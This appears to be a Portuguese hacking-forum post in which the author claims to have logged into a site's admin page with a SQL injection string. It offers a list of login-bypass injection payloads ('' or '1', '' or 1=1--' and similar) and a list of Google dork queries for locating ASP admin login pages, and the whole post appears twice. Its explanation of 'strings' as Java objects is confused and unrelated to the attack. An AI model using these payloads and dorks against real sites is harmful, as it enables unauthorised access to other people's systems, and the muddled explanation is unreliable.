Tweet
VÚNERAVEL | ~ Vidaama
Eu nunca postei, ^^ essa é a minha primeira contribuição, eu consegui logar nesse site com as chamadas strings.
Primeiro Oquê é uma "STRING"?
°Strings em Java são objetos que contém uma cadeia de caracteres. São imutáveis, portanto uma vez criadas não podem ser alteradas. Caso ocorra uma concatenação de Strings, um novo objeto é criado, e o antigo, automaticamente removido.
O site que estava vulnerável a isso é o site Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e a página de adm dele é Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... eu consegui logar nele com a string ' or '1
Como eu uso uma string?
º Eu pego a mesma (string) e coloco ela no loguin e a senha do site, facil assim.
Obs: Não é todos o sites que vão funcionar.
Aqui vou disponibilizar uma lista de strings para vocês.
- STRINGS PARA TER ACESSO ROOT -
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
E agora vou disponibilizar para vocês as strings usadas para se pesquisar no google.
- STRINGS PARA PESQUISA NO GOOGLE -
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
Olha eu aceito críticas, pois com elas que eu vou refletir sobre o meu erro, e poder melhorar. E eu pesso uma coisa, hackers lammers não vão no site e ownar ele, vocês são "egoístas", pegam o que a pessoa posto no site e faz um deface com o seu nome e ao menos agradece e acaba com as chances das pessoas analizarem o site.
Gostaram? Agradeçam.
Primeiro Oquê é uma "STRING"?
°Strings em Java são objetos que contém uma cadeia de caracteres. São imutáveis, portanto uma vez criadas não podem ser alteradas. Caso ocorra uma concatenação de Strings, um novo objeto é criado, e o antigo, automaticamente removido.
O site que estava vulnerável a isso é o site Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e a página de adm dele é Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... eu consegui logar nele com a string ' or '1
Como eu uso uma string?
º Eu pego a mesma (string) e coloco ela no loguin e a senha do site, facil assim.
Obs: Não é todos o sites que vão funcionar.
Aqui vou disponibilizar uma lista de strings para vocês.
- STRINGS PARA TER ACESSO ROOT -
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
E agora vou disponibilizar para vocês as strings usadas para se pesquisar no google.
- STRINGS PARA PESQUISA NO GOOGLE -
allinurl:admin/index.asp
allinurl:admin/default.asp
allinurl:admin/admin.asp
allinurl:admin/login.asp
allinurl:/admin/entrar.asp
allinurl:/admin/default.asp
allinurl:/admin/index.asp
allinurl:/admin/login.asp
allinurl:/admin/password.asp
allinurl:/admin/senha.asp
allinurl:/login/login.asp
allinurl:/adm/login.asp
allinurl:/adm/index.asp
allinurl:/adm/default.asp
allinurl:/login/index.asp
allinurl:/login/default.asp
allinurl:/webmaster/login.asp
allinurl:/webadmin/default.asp
allinurl:/webadmin/index.asp
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
allinurl:/web/admin/default.asp
allinurl:/web/admin/login.asp
allinurl:/home/adm/login.asp
allinurl:/home/adm/senha.asp
Olha eu aceito críticas, pois com elas que eu vou refletir sobre o meu erro, e poder melhorar. E eu pesso uma coisa, hackers lammers não vão no site e ownar ele, vocês são "egoístas", pegam o que a pessoa posto no site e faz um deface com o seu nome e ao menos agradece e acaba com as chances das pessoas analizarem o site.
Gostaram? Agradeçam.
Comment